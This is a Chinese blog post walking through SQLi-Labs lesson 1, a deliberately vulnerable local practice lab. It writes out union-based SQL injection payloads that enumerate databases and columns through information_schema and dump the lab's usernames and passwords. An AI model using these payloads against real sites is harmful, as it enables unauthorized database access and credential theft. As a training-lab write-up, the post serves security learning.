<!DOCTYPE html>
<html>
  <head>
      <script>
  var _hmt = _hmt || []
  ;(function() {
    var hm = document.createElement('script')
    hm.src = 'https://hm.baidu.com/hm.js?5a0acc897fd96474a2c8f4deac84611a'
    var s = document.getElementsByTagName('script')[0]
    s.parentNode.insertBefore(hm, s)
  })()
</script> 
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="keywords" content="" />
    <meta name="description" content="Life isn&#39;t about waiting for the storm to pass. It&#39;s about learning to dance in the rain" />
    
    <title>
          Rejeta&#39;s Blog
    </title>
    <link rel="manifest" href="/manifest.json" />
    <link rel="shortcut icon" href="/images/logo.jpeg" type="image/x-icon" />
    
<link rel="stylesheet" href="/style/style.css">

  <meta name="generator" content="Hexo 5.2.0"></head>
  <body>
    <canvas id='pagemap'></canvas>
    
    <div id="post-toc" class="animated hiddenToc hide">
      <span class="title">Toc</span>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-Labs%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B-sql-1"><span class="toc-text">SQL-Labs通关教程(sql-1)</span></a></li></ol>
    </div>
    
    <div id="fixed-menu-wrap">
      <span class="iconfont icon-sousuo search-box menu-reset"></span>
      <span class="icon-toc menu-reset">Toc</span>
      <span class="iconfont icon-arrowup menu-reset"></span>
    </div>
    <div id="fixed-menu">
      <span class="iconfont icon-menu-"></span>
    </div>
    <div id="progress">
      <div class="line"></div>
    </div>
    <div id="search-shade" class="animated hiddenSearch hide">
      <div class="input-wrap">
        <span class="iconfont icon-sousuo search-box"></span>
        <input type="text" placeholder="Search" />
        <span class="iconfont icon-close"></span>
      </div>
      <div class="search-result">
        <div class="meta">
          <span><b id="result-count">0</b> results found</span>
          <img src="/images/logo.jpeg" />
        </div>
        <ul id="result-box"></ul>
      </div>
    </div>
    <div id="menu-mask" class="animated hideMenuMask hide">
      <span class="iconfont icon-close"></span>
      <div class="nav">
        
        <a href="/" class="">
          首页
        </a>
        
        <a href="/archives" class="">
          归档
        </a>
        
        <a href="/categories" class="">
          分类
        </a>
        
        <a href="/tags" class="">
          标签
        </a>
        
        <a href="/friends" class="">
          友链
        </a>
        
        <a href="/about" class="">
          关于
        </a>
        
      </div>
    </div>
    <div id="header">
      <div class="intro">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <div class="author"></div>
      </div>
      <div class="nav">
        <span class="iconfont icon-menu menu-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
    </div>
    <div id="side" class="animated bounceInLeft">
      <div class="shrink">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <span class="iconfont icon-menu toggle-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
      <div class="magnify">
        <div class="about">
          <div class="author"></div>
          <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        </div>

        <div class="nav">
          
          <a href="/" class="">
            首页
          </a>
          
          <a href="/archives" class="">
            归档
          </a>
          
          <a href="/categories" class="">
            分类
          </a>
          
          <a href="/tags" class="">
            标签
          </a>
          
          <a href="/friends" class="">
            友链
          </a>
          
          <a href="/about" class="">
            关于
          </a>
          
          <a href="#" class="search-box">
            <span class="iconfont icon-sousuo"></span>
          </a>
        </div>
        <div class="bottom">
          <div class="follow">
            
            <a href="https://github.com/Diviad-Nick" target="_block">
              <span class="iconfont icon-github"></span>
            </a>
            
            <a href="https://www.zhihu.com/people/qing-huang-jiao-jie-97" target="_block">
              <span class="iconfont icon-zhihu"></span>
            </a>
             
            <a href="/atom.xml" target="_block">
              <span class="iconfont icon-rss"></span>
            </a>
            
          </div>
        </div>
      </div>
    </div>
    <div id="container">
      <div class="main animated bounceInRight delay-0.7s">
        <article class="post-entry">
    <div class="header">
      
      <div class="title"></div>
      <div class="meta">
        <span class="item">
          <span class="iconfont icon-time-circle"></span>
          <span>2020/11/18</span>
        </span>

        

        
        
        
      </div>
      <div>
      </div>
    </div>
    <html><head></head><body><h1 id="SQL-Labs通关教程-sql-1">SQL-Labs通关教程(sql-1)<a class="post-anchor" href="#SQL-Labs通关教程-sql-1"></a></h1><p>靶场搭建：下载phpstudy软件（在官网下载），安装到windows虚拟机上，打开软件，启动Apache服务和mysql服务。将sqllabs的靶场文件解压到C盘的phpstudy文件夹下面的WWW文件夹，然后使用cmd命令ipconfig查看虚拟机ip，就可以用物理机或者另一个虚拟机来访问靶场了，最好关闭防火墙。</p>
<p>第一关：<br>先使用探测手段来看是否有注入点</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">数字型：http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">字符型：http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=1'</span><br></pre></td></tr></tbody></table></figure>
<p>发现字符型的输入报错，接下来两个输入对比 </p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=1' and 1=1--+</span><br></pre></td></tr></tbody></table></figure>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2.http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=1' and 1=2--+</span><br></pre></td></tr></tbody></table></figure>
<p>对比之后发现第一条正常输入，第二条是非正常输入，这说明存在sql注入，我们可以通过构造and后面的语句来查询我们想要查询到的东西（–+是sql语句中的注释符号）<br>接下来查字段，看看在哪个字段上，sql语句是有效的</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=1' order by 3--+</span><br></pre></td></tr></tbody></table></figure>
<p>使用order by语句查询之后之后发现，字段是3。（order by 后面的数字是可以自己修改的），从order by开始，后面的查询语句不需要and语句在中间进行连接，我们需要得到的信息只需要构造语句就行了。</p>
<p>接下来查看当前数据库名称</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=%27%20union%20select%201,2,database()%20--+</span><br></pre></td></tr></tbody></table></figure>
<p>使用查询语句union select 1,2,database()查询到当前使用的数据库的名称叫做Security，接下来查询全部数据库的名称</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=%27%20union select 1,2,(select%20group_concat(schema_name)%20from%20information_schema.schemata) --+</span><br></pre></td></tr></tbody></table></figure>
<p>上面这条语句中，有两个点需要说明，首先是sql语句中的函数group_concat()，这个函数的使用方式就是select group_concat(name) from aa；该函数在连接查询的时候，能让查出的这字段的多个数，按字符拼接的方式存放在一起。 第二点就是查询的列叫做schema_name，sql中有一个概念叫做模式，schema就是sql中的模式，模式中包含了schema对象，可以是表(table)、列(column)、数据类型(data type)、视图(view)、存储过程(stored procedures)、关系(relationships)、主键(primary key)、外键(foreign key)等</p>
<p>查到的数据库名称有information_schema,challenges,mysql,performance_schema,security,sys,test1，接下来我们查询表名</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=%27%20union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273) --+</span><br></pre></td></tr></tbody></table></figure>
<p>查询表名的时候，我们发现，使用group_cat()函数指定数据库的时候，使用查询出来的数据库名称是行不通的，所以这里转换成16进制查询，拿到表名id,username,password，接下来就是查询字段了</p>
<figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">http://192.168.23.130/Sqli_Edited_Version-master/sqlilabs/Less-1/index.php?id=%27%20union select 1,2,(select%20group_concat(username,0x3a,password)%20from%20users)--+</span><br></pre></td></tr></tbody></table></figure>
<p>成功爆出字段usernamepassword字段名   0x3a： 0x是十六进制标志，3a是十进制的58，是ascii中的 ‘:’ ，用以分割pasword和username</p>
<p>Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4,admin5:admin5 </p>
</body></html>

  
  <div class="post-guide">
    <div class="item left">
        
          <a href="/2020/11/18/sql-labs%20%E9%80%9A%E5%85%B3%EF%BC%88sql-5%EF%BC%89/"></a>
        
    </div>
    <div class="item right">
        
          <a href="/2020/11/18/sql-labs%E9%80%9A%E5%85%B3%E6%94%BB%E7%95%A5%EF%BC%88sql-11%EF%BC%89/"></a>
        
    </div>
  </div>

  

  <div class="post-copyright">
    <div class="auth">
      本文作者：<a href="http://Diviad-Nick.github.io">Reteja</a>
    </div>
    <div class="link">
      永久链接：<a href="http://Diviad-Nick.github.io/2020/11/18/sql-labs%E9%80%9A%E5%85%B3(sql-1)/">http://Diviad-Nick.github.io/2020/11/18/sql-labs%E9%80%9A%E5%85%B3(sql-1)/</a>
    </div>
    <div class="declare">
      版权声明：本文首发于<a href="http://Diviad-Nick.github.io">Reteja</a>的博客，转载请注明出处！
    </div>
  </div>

  <div id="comment"></div>

  
  
</article>
        <footer>
          <div class="copyright">
            ©2020
            <a href="http://Diviad-Nick.github.io">Reteja</a> Powered by <a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a> |
            <a target="_blank" rel="noopener" href="https://github.com/shixiaohu2206/hexo-theme-huhu">hexo-theme-huhu</a>
          </div>
          
        </footer>
      </div>
    </div>
  </body>
  
</html>
<script type="text/javascript">
                  window.HUHU_CONFIG = JSON.parse("{\"share\":[\"weibo\",\"weixin\",\"qqkongjian\",\"QQ\",\"douban\",\"facebook\",\"twitter\",\"google\"],\"service_worker\":{\"open\":false}}")
                </script> <script type="text/javascript">window.addEventListener('load', function() {
    
    window.loadJs = function(d, m, a) {
      var c = document.getElementsByTagName('head')[0] || document.head || document.documentElement
      var b = document.createElement('script')
      b.defer = true
      b.setAttribute('type', 'text/javascript')
      b.setAttribute('charset', 'UTF-8')
      b.setAttribute('async', 'true')
      b.setAttribute('src', d)
      m && b.setAttribute('data-main', '/scripts/app-built')
      if (typeof a === 'function') {
        if (window.attachEvent) {
          b.onreadystatechange = function() {
            var e = b.readyState
            if (e === 'loaded' || e === 'complete') {
              b.onreadystatechange = null
              a()
            }
          }
        } else {
          b.onload = a
        }
      }
      c.appendChild(b)
    }
    window.loadJs && window.loadJs('https://cdn.bootcss.com/require.js/2.3.6/require.min.js', true, function() {require.config({"paths":{"util":"util","share":"share","search":"search","pagemap":"pagemap.min","registerSW":"registerSW","valine":"cdn/Valine.min","av":["https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min"],"pjax":["https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min"],"jquery":["https://cdn.bootcss.com/jquery/3.4.1/jquery.min"],"confirm":["https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min"],"fancybox":["https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min"],"chart":["https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.bundle.min"]},"map":{"*":{"css":"https://cdn.bootcss.com/require-css/0.1.10/css.min.js"}},"shim":{"fancybox":{"deps":["css!https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css"]},"confirm":{"deps":["css!https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min.css"]},"chart":{"deps":["css!https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.min.css"]}},"waitSeconds":3})})
  })</script> <script type="text/javascript">
                  ;(function() {
                    var bp = document.createElement('script')
                    var curProtocol = window.location.protocol.split(':')[0]
                    if (curProtocol === 'https') {
                      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'
                    } else {
                      bp.src = 'http://push.zhanzhang.baidu.com/push.js'
                    }
                    var s = document.getElementsByTagName('script')[0]
                    s.parentNode.insertBefore(bp, s)
                  })()
                </script> 
